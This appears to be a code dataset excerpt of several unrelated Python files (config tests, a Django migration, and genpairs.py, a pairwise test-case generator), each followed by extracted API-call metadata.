assert config.snapshot_source_db_identifier == DEV_DATABASE_IDENTIFIER
assert config.branch == 'my-branch'
assert config.pipeline == 'my-pipeline'
assert config.name == 'demo'
config = build_config_from_name(
'demo',
branch='my-branch',
# Overrides.
pipeline='my-pipeline',
)
config = build_config_from_name(
'dev',
branch='my-branch',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
assert config.snapshot_source_db_identifier is None
assert config.branch == 'my-branch'
assert config.pipeline == 'ContinuousDeploymentPipelineStack'
assert config.name == 'dev'
def test_config_build_config_from_branch():
from infrastructure.config import get_config_name_from_branch
config_name = get_config_name_from_branch('IGVF-123-add-new-feature')
assert config_name == 'demo'
config_name = get_config_name_from_branch('dev')
assert config_name == 'dev'
|
[
"infrastructure.config.get_config_name_from_branch",
"infrastructure.config.build_config_from_name",
"infrastructure.config.Common",
"infrastructure.config.Config"
] |
[((226, 234), 'infrastructure.config.Common', 'Common', ([], {}), '()\n', (232, 234), False, 'from infrastructure.config import Common\n'), ((424, 489), 'infrastructure.config.Config', 'Config', ([], {'name': '"""demo"""', 'branch': '"""xyz-branch"""', 'pipeline': '"""xyz-pipeline"""'}), "(name='demo', branch='xyz-branch', pipeline='xyz-pipeline')\n", (430, 489), False, 'from infrastructure.config import Config\n'), ((953, 1027), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""demo"""'], {'branch': '"""my-branch"""', 'pipeline': '"""my-pipeline"""'}), "('demo', branch='my-branch', pipeline='my-pipeline')\n", (975, 1027), False, 'from infrastructure.config import build_config_from_name\n'), ((1371, 1445), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""demo"""'], {'branch': '"""my-branch"""', 'pipeline': '"""my-pipeline"""'}), "('demo', branch='my-branch', pipeline='my-pipeline')\n", (1393, 1445), False, 'from infrastructure.config import build_config_from_name\n'), ((1511, 1560), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""dev"""'], {'branch': '"""my-branch"""'}), "('dev', branch='my-branch')\n", (1533, 1560), False, 'from infrastructure.config import build_config_from_name\n'), ((2015, 2070), 'infrastructure.config.get_config_name_from_branch', 'get_config_name_from_branch', (['"""IGVF-123-add-new-feature"""'], {}), "('IGVF-123-add-new-feature')\n", (2042, 2070), False, 'from infrastructure.config import get_config_name_from_branch\n'), ((2122, 2156), 'infrastructure.config.get_config_name_from_branch', 'get_config_name_from_branch', (['"""dev"""'], {}), "('dev')\n", (2149, 2156), False, 'from infrastructure.config import get_config_name_from_branch\n')]
|
from .cube import *
from .cube_animations import *
try:
import importlib.metadata as importlib_metadata
except ModuleNotFoundError:
import importlib_metadata
__version__ = importlib_metadata.version(__name__)
|
[
"importlib_metadata.version"
] |
[((182, 218), 'importlib_metadata.version', 'importlib_metadata.version', (['__name__'], {}), '(__name__)\n', (208, 218), False, 'import importlib_metadata\n')]
|
# Generated by Django 3.2 on 2022-01-20 21:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("auth", "0012_alter_user_first_name_max_length"),
("auth_app", "0002_businessowner_is_superuser"),
]
operations = [
migrations.AddField(
model_name="businessowner",
name="groups",
field=models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
migrations.AddField(
model_name="businessowner",
name="user_permissions",
field=models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
]
|
[
"django.db.models.ManyToManyField"
] |
[((407, 658), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'help_text': '"""The groups this user belongs to. A user will get all permissions granted to each of their groups."""', 'related_name': '"""user_set"""', 'related_query_name': '"""user"""', 'to': '"""auth.Group"""', 'verbose_name': '"""groups"""'}), "(blank=True, help_text=\n 'The groups this user belongs to. A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to='auth.Group',\n verbose_name='groups')\n", (429, 658), False, 'from django.db import migrations, models\n'), ((892, 1096), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'help_text': '"""Specific permissions for this user."""', 'related_name': '"""user_set"""', 'related_query_name': '"""user"""', 'to': '"""auth.Permission"""', 'verbose_name': '"""user permissions"""'}), "(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions')\n", (914, 1096), False, 'from django.db import migrations, models\n')]
|
import csv
import yaml
from dixday_predictions import __version__
from dixday_predictions.eventhandler.EventHandler import EventHandler
def _read_config(config_path) -> dict:
with open(config_path, "r") as ymlfile:
config = yaml.safe_load(ymlfile)
return config
def test_version():
assert __version__ == '0.1.5'
|
[
"yaml.safe_load"
] |
[((239, 262), 'yaml.safe_load', 'yaml.safe_load', (['ymlfile'], {}), '(ymlfile)\n', (253, 262), False, 'import yaml\n')]
|
# Generate an all-pairs covering test suite
#
# (c) 2007 University of Oregon and <NAME>
# All rights reserved.
#
License = """
(C) 2007,2017 University of Oregon and <NAME>. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the
distribution.
* Neither the name of the University of Oregon nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
This software is provided by the copyright holders and contributors
"as is" and any express or implied warranties, including, but not
limited to, the implied warranties of merchantability and fitness for
a particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
"""
usage = """Usage:
# To read a specification (foo.cp) and print the test vector in human-readable
# format:
python genpairs.py < foo.cp
# To read a partial suite of test cases (tests.txt) in CSV format,
# plus a test specification, and report which pairs of values have not
# been covered:
python genpairs.py --csv --initial-suite tests.txt -o -v -p < foo.cp
# To read the same as above, and then produce a test suite that
# covers the missing pairs:
python genpairs.py --csv --initial-suite tests.txt < foo.cp
"""
#
# An item is a pair (slot number, value)
# An itempair is a pair (item, item), that is, ((slot, value), (slot, value))
# An obligation is a pair (the two items must occur together in some case)
# An exclusion is a pair (the two items must not occur together in any case)
# A case is a list (array) with n columns
#
# Representations:
# A test case is represented as a list, indexed by column (category)
# A test suite is a list of test cases
# An item is a tuple, and an itempair is a tuple
#
# Like AETG and several other covering array generators, the outer
# loop will generate test cases, and the inner loops try to fulfill
# as many test obligations as possible with each test case.
#
# Data structures:
# We will record obligations in three different data structures,
# for different forms of quick access:
# ObsList is a list of obligations, some of which may
# already have been fulfilled (deletion is lazy). We may scramble
# this list so we don't have an unfortunate ordering.
# Outstanding is a set of all the obligations still outstanding.
# ObsByCol is a dictionary obligations by column, also updated lazily.
#
# Exclude is a dictionary mapping items to lists of item.
#
import sys ## for file handling
import random ## for shuffling lists
import csv ## for reading and writing test suites
## Constants (other than tokens for parsing)
DontCare = "_"
## Configuration parameters
DBG = False ## Debugging mode, on (true) or off (false)
DBGp = False ## Performance debugging, December 2006
maxCandidates = 50 ## Bigger = better solutions, smaller = faster
## Platform compatibility
# ----------------------------------------
import six # Python 2 and 3 compatibility
from six import print_
## Logging
#
import logging
logging.basicConfig(format='%(levelname)s:%(message)s',
level=logging.WARNING)
Log = logging.getLogger(__name__)
# Debug messages
def dbg(*msg):
parts = [ str(x) for x in msg ]
msg_string = " ".join(parts)
Log.debug(msg_string)
# Performance debug messages
def dbg_p(*msg):
if DBGp:
dbg(*msg)
# ------------------------------------
## User arguments
from optparse import OptionParser
optparser = OptionParser(usage=usage)
optparser.set_defaults(output_format="plain")
optparser.add_option("-d", "--debug",
help="Print a lot of debugging messages",
action="store_true", default=False, dest="debug")
optparser.add_option("-l", "--license",
help="Print license terms (and then quit)",
action="store_true",default=False, dest="license")
optparser.add_option("--csv", "-c", "--comma-separated-values",
action="store_const", dest="output_format",
const = "csv",
help = """Output format is comma-separated-values
(suitable as input to Excel and other spreadsheets,
genpairs with the -i option, and some other
programs).""")
optparser.add_option("-v", "--varying", "--varying-columns-only",
action="store_true", default=False, dest="varying",
help="""Include only categories with more than one
non-error and non-single value""")
optparser.add_option("-s", "--singles", "--singles-only",
action="store_false", default=True, dest="combinations",
help="""Print only test cases covering 'error'
and 'single' values.""")
optparser.add_option("-o", "--omit-singles",
action="store_false", default=True, dest="singles",
help = """Do not produce test cases covering 'single'
or 'error' values.""")
optparser.add_option("-i", "--initial", "--initial-suite",
action="append", default = [], dest="initial_suite",
help="""Read initial test suite (in csv format). Often
used together with -p""")
optparser.add_option("-p", "--pairs", "--print-pairs",
action="store_true", default=False, dest="pairs",
help="""Report pairs not covered by initial test suites.
(Useful only with --initial)""")
(UserOptions, UserArgs) = optparser.parse_args()
Log.info("User options: ", UserOptions)
if UserOptions.debug :
print_("Enabling debugging")
DBG=True
Log.setLevel(logging.DEBUG)
## Primary data structures
CategoriesList = [ ] ## List of category names (in order given)
## The CategoriesList can also be considered the test case schema
CategoriesValues = [ ] ## List of value sets
Singles = [] ## List of (slot,value,kind) where kind is "single" or "error"
Excludes = set() ## Set of ((slot,value),(slot,value)) (not symmetric)
ObsList = [ ] # All obligations, but only one direction
Outstanding = set() # All obligations, but only one direction
ObsByCol = {} # Per column, both directions
SingleColumns = [ ] # Columns with just one (non-error, non-single) choice
MultipleColumns = [ ] # Complement of SingleColumns -- pairs are from these
NCol = 0 # ==len(CategoriesList), set after parsing
## Temporary, for building excludes
PropsSlots = { } # For each property name, set of slots with it
CategoriesProps = { } # For each category, all props on any values
ValueProps = { } # Map (slot,value) pair to list of condition names
ValueIfs = [ ] # List of (value, slot, condition) triples
ValueExcepts = [ ] # List of (value, slot, condition) triples
## What we build
Suite = [ ] ## List of test cases
## Instrumentation
INSTR_N_Comparisons = 0
# ---------- Read spec file using a simple LL parser ----
# Consts for token classification
EOF = "<EOF>"
CategoryToken = "<CAT>"
ValueToken = "<VAL>"
IfToken = "<IF>"
PropToken = "<PROP>"
ExceptToken = "<EXCEPT>"
ErrorToken = "<ERROR>"
SingleToken = "<SINGLE>"
EOFToken = EOF
def tokenClass( tok ) :
if tok == EOF : return EOFToken
if tok.endswith(":") : return CategoryToken
if tok == "if" : return IfToken
if tok == "prop" : return PropToken
if tok == "except" : return ExceptToken
if tok == "single" : return SingleToken
if tok == "error" : return ErrorToken
return ValueToken
# Generator to produce tokens, one by one
#
def getToken() :
while 1:
s = sys.stdin.readline()
if not s:
dbg("#DBG <<EOF reached>>")
yield EOF
return
commentPos = s.find("//");
if commentPos >= 0 :
s = s[0:commentPos]
for word in s.split() :
dbg("#DBG <<%s: %s>>" % ( word, tokenClass(word) ) )
yield word
Token = "<PASSWORD>"
tokenStream = getToken()
def parse():
global Token
global NCol
Token = six.next(tokenStream)
parseSpec()
NCol = len(CategoriesList)
def parseSpec():
global Token
dbg("#DBG (parseSpec)")
if Token == EOF : return [ ]
if tokenClass( Token ) != CategoryToken :
print_("Syntax error on ", Token, " looking for 'category:'")
print_("Skipping to next category")
## Error recovery to next category
while tokenClass( Token ) != CategoryToken :
if tokenClass( Token ) == EOF :
print_("Discarding rest of file")
return [ ]
Token = tokenStream.next()
print_("Resuming from" , Token)
category = Token[0:-1]
Token = six.next(tokenStream)
values = parseValues()
dbg("#DBG Parsed: ", category, " ::= ", values)
slotNum = len(CategoriesList)
CategoriesList.append( category )
vlist = [ ]
CategoriesValues.append(vlist)
CategoriesProps[ category ] = [ ]
for valDesc in values :
val = valDesc[0] ## The name of the value itself
## Postpone marking val as a possible value of the property
## until we know whether it is a singleton
singleton = False
ValueProps[ (slotNum, val) ] = [] ## List of its properties
for cond in valDesc[1:] :
kind = nameOf(cond)
condVal = valOf(cond)
if kind == "prop" :
CategoriesProps[ category ].append(condVal)
ValueProps[ (slotNum, val ) ].append(condVal)
if condVal not in PropsSlots :
PropsSlots[condVal] = set()
PropsSlots[condVal].add(slotNum)
elif kind == "if" :
ValueIfs.append( (val, slotNum, condVal ) )
elif kind == "except" :
ValueExcepts.append( (val, slotNum, condVal) )
elif kind == "error" or kind == "single" :
Singles.append( (val, slotNum, kind) )
singleton = True
else :
print_("*ERR* Unrecognized condition attribute:", cond)
if not singleton: vlist.append( val )
parseSpec()
def parseValues():
global Token
dbg("#DBG (parseValues)")
values = [ ]
while tokenClass( Token ) == ValueToken :
val = parseValue()
dbg("#DBG (parsed value: ", val, ")")
values.append( val )
return values
def parseValue():
global Token
dbg("#DBG (parseValue, looking at ", Token, ")")
if tokenClass( Token ) != ValueToken :
print_("Syntax error, expecting value, saw ", Token )
return [ "--bogus--"]
value = [ Token ]
Token = six.next(tokenStream)
conditions = parseConditions()
dbg("#DBG parseValue returns", value + conditions)
return value + conditions
def parseConditions():
global Token
dbg("#DBG (parseConditions)")
if tokenClass( Token ) == ErrorToken :
Token = six.next(tokenStream)
return [("error", None )] + parseConditions()
if tokenClass( Token ) == SingleToken :
Token = six.next(tokenStream)
return [("single", None)] + parseConditions()
if tokenClass( Token ) == IfToken :
Token = six.next(tokenStream)
ifcond = Token
Token = six.next(tokenStream)
return [("if" , ifcond)] + parseConditions()
if tokenClass( Token ) == PropToken :
Token = six.next(tokenStream)
condname = Token
Token = six.next(tokenStream)
return [("prop" , condname)] + parseConditions()
if tokenClass( Token ) == ExceptToken :
Token = six.next(tokenStream)
condname = Token
Token = six.next(tokenStream)
return [("except" , condname)] + parseConditions()
dbg("#DBG No more conditions")
return [ ]
# -------------- The form of a pair (obligation or exclusion) -----
def makePair( s1, v1, s2, v2 ):
return ((s1, v1), (s2, v2))
def reversePair( pair ):
return ( pair[1], pair[0] )
# Each item in the pair is a <slot,value> or <name,value> pair
def slotOf( tuple ):
return tuple[0]
def nameOf( tuple ):
return tuple[0]
def valOf( tuple ):
return tuple[1]
# --------------- Build initial data structures ----
# Single columns are those in which all but one value is
# listed as a "single" or "error" choice, i.e., for pairs
# generation the value will be fixed. We can save some time by
# always fixing these at the beginning of pairs generation, and
# we can save space in output by suppressing them.
# (Note they may still participate in excludes.)
#
# We'll identify the multiples (non-single columns) as well,
# because they are useful in several places
#
def identifySingles() :
for slot in range(len(CategoriesList)) :
if len(CategoriesValues[slot]) == 0 :
print_("Warning: No non-singular value choices for ",
CategoriesList[slot],
"; Pairs generation will fail.")
elif len(CategoriesValues[slot]) == 1 :
SingleColumns.append(slot)
else:
MultipleColumns.append(slot)
# Obligations depend on excludes, so call makeExcludes before
# calling makeObligations
#
def makeExcludes() :
# Excludes that come from "except" clauses
for ExceptCond in ValueExcepts :
val, slot, cond = ExceptCond
for conflict_slot in PropsSlots[ cond ] :
for cs_value in CategoriesValues[ conflict_slot ] :
if cond in ValueProps[ (conflict_slot, cs_value) ] :
Excludes.add( makePair( slot, val, conflict_slot, cs_value))
# Excludes that come from "if" clauses --- reverse sense
for IfCond in ValueIfs :
val, slot, cond = IfCond
for conflict_slot in PropsSlots[ cond ] :
for cs_value in CategoriesValues[ conflict_slot ] :
if cond not in ValueProps[ (conflict_slot, cs_value) ] :
Excludes.add( makePair( slot, val, conflict_slot, cs_value))
def makeObligations() :
if DBG:
print_("--- Creating obligations list ---")
keys = CategoriesList
nslots = len(keys)
for i in range(nslots):
ObsByCol[i] = []
for i in MultipleColumns :
for v1 in CategoriesValues[i] :
i_item = (i, v1)
for j in range(i+1,nslots) :
## if j in SingleColumns: continue ##
## --- short cut doesn't work if only one varying column --
for v2 in CategoriesValues[j] :
j_item = (j, v2)
obforward = (i_item, j_item)
obbackward = (j_item, i_item)
if obforward not in Excludes and obbackward not in Excludes:
ObsList.append(obforward)
Outstanding.add(obforward)
ObsByCol[ i ].append(obforward)
ObsByCol[ j ].append(obbackward)
random.shuffle(ObsList)
dbg("--- ObsList complete, ", len(ObsList), " obligations ---")
# When we complete a test case, we remove obligations from
# the outstanding obligations list. The other lists are
# cleared lazily, when we bring up an obligation.
#
def clearObligations(testcase) :
testCaseValue = 0
for i in range( len(testcase) ):
for j in range ( i+1, len(testcase) ):
ob = makePair(i, testcase[i], j, testcase[j])
if ob in Outstanding:
Outstanding.remove(ob)
testCaseValue = testCaseValue + 1
dbg("*** Value ", testCaseValue, testcase )
# ---------------------------------------------------------
#
# Is a given (slot,value) pair compatible with the test case so far?
#
def compatible( item, testcase ) :
slot, val = item
if ( testcase[ slot ] != DontCare and testcase[slot] != val) :
return False
for tslot in range(len(testcase)) :
if ((slot, val), (tslot, testcase[tslot])) in Excludes:
return False
if ((tslot, testcase[tslot]),(slot,val)) in Excludes:
return False
return True
# ---------------------------------------------------------
def MakeTuple ( len ):
newList = []
for i in range(0,len):
newList.append(DontCare)
return newList
def CreateCase():
seedObligation = ObsList.pop()
while seedObligation not in Outstanding:
if (len(ObsList) == 0): return
seedObligation = ObsList.pop()
s1, v1 = seedObligation[0]
s2, v2 = seedObligation[1]
testcase = MakeTuple( len(CategoriesList) )
testcase[s1] = v1
testcase[s2] = v2
for slot in SingleColumns :
testcase[slot] = CategoriesValues[slot][0]
dbg("#DBG === Attempting tuple seeded with", testcase)
columnOrder = list(range( len(CategoriesList) ) )
random.shuffle(columnOrder)
if ( completeCase( columnOrder, testcase ) ) :
Suite.append( testcase )
clearObligations( testcase )
else:
CaseMessage( "Warning - No pair possible: ", testcase )
def CreateSingles():
for single in Singles:
CreateSingle(single)
def CreateSingle( single ):
testcase = MakeTuple( len(CategoriesList) )
columnOrder = list(range( len(CategoriesList) ) )
random.shuffle(columnOrder)
value, slot, kind = single
dbg("#DBG single obligation: ", slot, value, kind)
testcase[slot] = value
if completeCase( columnOrder, testcase ) :
Suite.append( testcase )
else:
CaseMessage( "Warning - No pair possible: ", testcase )
def completeCase( columnOrder, testcase ) :
if len (columnOrder) == 0 :
dbg_p("#DBG: *** Success: ", testcase)
return True
dbg_p("#DBG * Attempting to complete", testcase )
col = columnOrder[0]
if testcase[col] != DontCare:
dbg_p("#DBG * Skipping column ", col, " (already filled in)")
return completeCase( columnOrder[1:], testcase )
dbg("#DBG ***Trying columns ", columnOrder, " in ", testcase)
# How shall we fill this DontCare with something useful?
# Let's try for an outstanding obligation.
# Dec 2006 --- Let's look at all the outstanding obligations
# and choose the one with highest score. This is fairly expensive
# (10^20 takes about 9 minutes wall time on G4 laptop), so now we
# set a limit (maxCandidates) on number of candidates considered
colObs = ObsByCol[col]
candidates = [ ]
obindex = 0
while obindex < len(colObs) and len(candidates) < maxCandidates :
ob = colObs[obindex]
if not (ob in Outstanding or reversePair(ob) in Outstanding):
# Here is our lazy deletion of obligations; we
# clip from the end of the list
dbg_p("#DBG * Lazy deletion")
colObs[obindex] = colObs[ len(colObs) - 1 ]
colObs.pop()
else:
if compatible(ob[0], testcase) and compatible(ob[1], testcase):
dbg_p("#DBG *** Compatible", ob, testcase )
# Score the
# Note one (but not both) of these may coincide with
# an existing element. We'll only consider *added* value,
# so we score the *new* parts only.
value = 1 ## For at least meeting one obligation
((s1, v1), (s2, v2)) = ob
if testcase[s1] != v1 :
for ccol in range( len(testcase) ):
if ((s1,v1),(ccol,testcase[ccol])) in Outstanding :
value = value + 1
if ((ccol,testcase[ccol]),(s1,v1)) in Outstanding :
value = value + 1
if testcase[s2] != v2 :
for ccol in range( len(testcase) ):
if ((s2,v2),(ccol,testcase[ccol])) in Outstanding :
value = value + 1
if ((ccol,testcase[ccol]),(s2,v2)) in Outstanding :
value = value + 1
candidates.append( (value, ob) )
obindex = obindex + 1
candidates.sort()
candidates.reverse()
dbg_p("### Candidates: ", candidates)
for cand in candidates:
(score, ((s1, v1),(s2,v2))) = cand
old_v1 = testcase[ s1 ]
testcase[ s1 ] = v1
old_v2 = testcase[ s2 ]
testcase[ s2 ] = v2
if completeCase( columnOrder[1:] , testcase ):
return True
else:
dbg_p("#DBG *** Rolling back ", s1, s2)
# Restore previous values
testcase[ s1 ] = old_v1
testcase[ s2 ] = old_v2
## If we couldn't score any more obligations, can we at least
## fill in some compatible value and move on?
dbg_p("#DBG *** Trying any value, regardless of obligation")
for val in CategoriesValues[ col ] :
if compatible((col,val), testcase) :
testcase[ col ] = val
if completeCase( columnOrder[1:], testcase ):
return True
else:
testcase[ col ] = DontCare
dbg_p("#DBG ** Failing to fill column ", col , " with ", testcase)
return False
# ------------------------------------------------------------
# Print Warnings (to stderr unless otherwise specified)
# ------------------------------------------------------------
def CaseMessage( msg, vector, dest=sys.stderr ) :
"""Print a warning or error message concerning a
particular partially-defined test vector"""
print_( "{} [".format(msg), end="", file=dest)
sep=""
for col in range(len(vector)) :
if vector[col] == DontCare :
print_(sep+"_",end="", file=dest)
else:
print_("{}{}={}".format(sep,CategoriesList[col],vector[col]),
end="", file=dest)
sep=", "
print_("]",file=dest)
def ObToVector( ob ) :
"""Convert obligation to vector for debugging messages"""
t = MakeTuple( NCol )
s1,v1 = ob[0]
s2,v2 = ob[1]
t[s1]=v1
t[s2]=v2
return t
# ------------------------------------------------------------
# Print results
# ------------------------------------------------------------
def PrintTable( columns, descriptive_title ) :
if UserOptions.output_format == "csv" :
PrintAsCSV( columns )
else:
PrintAsText( columns, descriptive_title )
def PrintAsText( columns, descriptive_title ):
print_(descriptive_title + ":", len(Suite), " test vectors")
print_("")
for slot in columns :
parm = CategoriesList[ slot ]
print_("%15s" % parm , end="")
print_("")
print_("_"*60)
for t in Suite :
for slot in columns :
value = t[slot]
print_("%15s" % value , end="")
print_( "" )
print_( "" )
def PrintAsCSV(columns):
""" Print vectors as comma-separated values, for import
into a spreadsheet or other CSV-consuming application. """
dbg("Print as CSV")
csv_writer = csv.writer( sys.stdout, dialect=csv.excel )
schema_row = [ ]
for slot in columns :
schema_row.append( CategoriesList[slot] )
csv_writer.writerow(schema_row)
for t in Suite :
dbg("write row " , t )
csv_writer.writerow( t )
# ----------------
## Read an initial test suite (or several), and
## eliminate those obligations, so we are creating
## a test suite to fill in the remainder of the test
## obligations.
##
## NOTE: Currently considering only pair obligations,
## not singletons. We should look at single and error
## cases first, and
## * Not consider any test case with more than one
## single or error value (we don't know which will be handled
## by the application, and we assume special case processing
## may miss other features, including other special cases)
## * Not consider any pairs as being satisfied by a single
## or error case.
## For now, we just assume that the initial test suite is not
## a suite of special and error cases.
##
class csv_dialect(csv.excel):
skipinitialspace=True ## Seems to have no effect
def initial_suite_clear( initial_suite ) :
matches = False
reader = csv.reader( open(initial_suite, "r"),
csv_dialect) ## Working yet? (No.)
## First line should be schema
in_schema = reader.next()
in_schema_map = [ ]
for i in range(len(in_schema)):
col = in_schema[i]
if col in CategoriesList:
to_col = CategoriesList.index(col)
in_schema_map.append(to_col)
else:
print_("Warning: schema mismatch in", initial_suite)
print_(" Column ", i, "'" + col + "'", "not in specification")
in_schema_map.append(-1)
for vec in reader:
if len(vec) == len(in_schema) :
trvec = MakeTuple(len(CategoriesList))
for i in range(len(vec)) :
if in_schema_map[i] != -1 :
trvec[in_schema_map[i]] = vec[i]
clearObligations( trvec )
else:
print_("*** Warning, format mismatch with initial suite ",
initial_suite)
print_("*** Expecting columns ",
in_schema , " but saw ", vec)
# ----------------
## Print the set of outstanding obligations. Typical use is when
## we are trying to see what is missing in an initial test suite.
##
def print_required_pairs( ) :
for ob in Outstanding :
s1, v1 = ob[0]
name1=CategoriesList[s1]
s2, v2 = ob[1]
name2=CategoriesList[s2]
print_("%s=%s, %s=%s" % (name1, v1, name2, v2))
## ------------------------------------------------------------
## MAIN PROGRAM (after initialization above)
## ------------------------------------------------------------
# -- Respond to special diagnostic options --
if UserOptions.license:
print_(License)
exit(0)
if UserOptions.debug:
print_("---------------------------")
print_("Options in effect: ")
print_("debug: ", UserOptions.debug)
print_("output_format:", UserOptions.output_format)
print_("varying:", UserOptions.varying)
print_("combinations:", UserOptions.combinations)
print_("singles:", UserOptions.singles)
print_("initial_suite:", UserOptions.initial_suite)
print_("pairs:", UserOptions.pairs)
print_("---------------------------")
# -- Main processing: Parse the script, execute, print --
parse()
identifySingles()
makeExcludes()
makeObligations()
for suite in UserOptions.initial_suite :
initial_suite_clear( suite )
if UserOptions.pairs :
print_("=== Pairs required for completion ===" )
print_required_pairs()
print_("=====================================")
if UserOptions.combinations :
while len(ObsList) > 0 :
CreateCase()
if UserOptions.varying :
PrintTable( MultipleColumns, "Pairwise coverage, varying columns only" )
else:
PrintTable( range(len(CategoriesList)), "Pairwise coverage" )
if UserOptions.singles :
Suite = [ ]
CreateSingles()
PrintTable( range(len(CategoriesList)), "Single and error vectors" )
|
[
"six.next",
"csv.writer",
"optparse.OptionParser",
"logging.basicConfig",
"random.shuffle",
"sys.stdin.readline",
"six.print_",
"logging.getLogger"
] |
[((3980, 4058), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(message)s"""', 'level': 'logging.WARNING'}), "(format='%(levelname)s:%(message)s', level=logging.WARNING)\n", (3999, 4058), False, 'import logging\n'), ((4089, 4116), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4106, 4116), False, 'import logging\n'), ((4434, 4459), 'optparse.OptionParser', 'OptionParser', ([], {'usage': 'usage'}), '(usage=usage)\n', (4446, 4459), False, 'from optparse import OptionParser\n'), ((6584, 6612), 'six.print_', 'print_', (['"""Enabling debugging"""'], {}), "('Enabling debugging')\n", (6590, 6612), False, 'from six import print_\n'), ((9043, 9064), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (9051, 9064), False, 'import six\n'), ((9709, 9730), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (9717, 9730), False, 'import six\n'), ((11687, 11708), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (11695, 11708), False, 'import six\n'), ((16004, 16027), 'random.shuffle', 'random.shuffle', (['ObsList'], {}), '(ObsList)\n', (16018, 16027), False, 'import random\n'), ((17879, 17906), 'random.shuffle', 'random.shuffle', (['columnOrder'], {}), '(columnOrder)\n', (17893, 17906), False, 'import random\n'), ((18323, 18350), 'random.shuffle', 'random.shuffle', (['columnOrder'], {}), '(columnOrder)\n', (18337, 18350), False, 'import random\n'), ((22969, 22991), 'six.print_', 'print_', (['"""]"""'], {'file': 'dest'}), "(']', file=dest)\n", (22975, 22991), False, 'from six import print_\n'), ((23630, 23640), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23636, 23640), False, 'from six import print_\n'), ((23750, 23760), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23756, 23760), False, 'from six import print_\n'), ((23765, 23781), 'six.print_', 'print_', (["('_' * 60)"], {}), "('_' * 60)\n", (23771, 23781), False, 'from six import print_\n'), ((23931, 23941), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23937, 23941), False, 'from six import print_\n'), ((24140, 24181), 'csv.writer', 'csv.writer', (['sys.stdout'], {'dialect': 'csv.excel'}), '(sys.stdout, dialect=csv.excel)\n', (24150, 24181), False, 'import csv\n'), ((27055, 27070), 'six.print_', 'print_', (['License'], {}), '(License)\n', (27061, 27070), False, 'from six import print_\n'), ((27111, 27148), 'six.print_', 'print_', (['"""---------------------------"""'], {}), "('---------------------------')\n", (27117, 27148), False, 'from six import print_\n'), ((27153, 27182), 'six.print_', 'print_', (['"""Options in effect: """'], {}), "('Options in effect: ')\n", (27159, 27182), False, 'from six import print_\n'), ((27187, 27223), 'six.print_', 'print_', (['"""debug: """', 'UserOptions.debug'], {}), "('debug: ', UserOptions.debug)\n", (27193, 27223), False, 'from six import print_\n'), ((27228, 27279), 'six.print_', 'print_', (['"""output_format:"""', 'UserOptions.output_format'], {}), "('output_format:', UserOptions.output_format)\n", (27234, 27279), False, 'from six import print_\n'), ((27284, 27323), 'six.print_', 'print_', (['"""varying:"""', 'UserOptions.varying'], {}), "('varying:', UserOptions.varying)\n", (27290, 27323), False, 'from six import print_\n'), ((27328, 27377), 'six.print_', 'print_', (['"""combinations:"""', 'UserOptions.combinations'], {}), "('combinations:', UserOptions.combinations)\n", (27334, 27377), False, 'from six import print_\n'), ((27382, 27421), 'six.print_', 'print_', (['"""singles:"""', 'UserOptions.singles'], {}), "('singles:', UserOptions.singles)\n", (27388, 27421), False, 'from six import print_\n'), ((27426, 27477), 'six.print_', 'print_', (['"""initial_suite:"""', 'UserOptions.initial_suite'], {}), "('initial_suite:', UserOptions.initial_suite)\n", (27432, 27477), False, 'from six import print_\n'), ((27482, 27517), 'six.print_', 'print_', (['"""pairs:"""', 'UserOptions.pairs'], {}), "('pairs:', UserOptions.pairs)\n", (27488, 27517), False, 'from six import print_\n'), ((27522, 27559), 'six.print_', 'print_', (['"""---------------------------"""'], {}), "('---------------------------')\n", (27528, 27559), False, 'from six import print_\n'), ((27790, 27837), 'six.print_', 'print_', (['"""=== Pairs required for completion ==="""'], {}), "('=== Pairs required for completion ===')\n", (27796, 27837), False, 'from six import print_\n'), ((27871, 27918), 'six.print_', 'print_', (['"""====================================="""'], {}), "('=====================================')\n", (27877, 27918), False, 'from six import print_\n'), ((8589, 8609), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (8607, 8609), False, 'import sys\n'), ((9265, 9326), 'six.print_', 'print_', (['"""Syntax error on """', 'Token', '""" looking for \'category:\'"""'], {}), '(\'Syntax error on \', Token, " looking for \'category:\'")\n', (9271, 9326), False, 'from six import print_\n'), ((9335, 9370), 'six.print_', 'print_', (['"""Skipping to next category"""'], {}), "('Skipping to next category')\n", (9341, 9370), False, 'from six import print_\n'), ((9638, 9668), 'six.print_', 'print_', (['"""Resuming 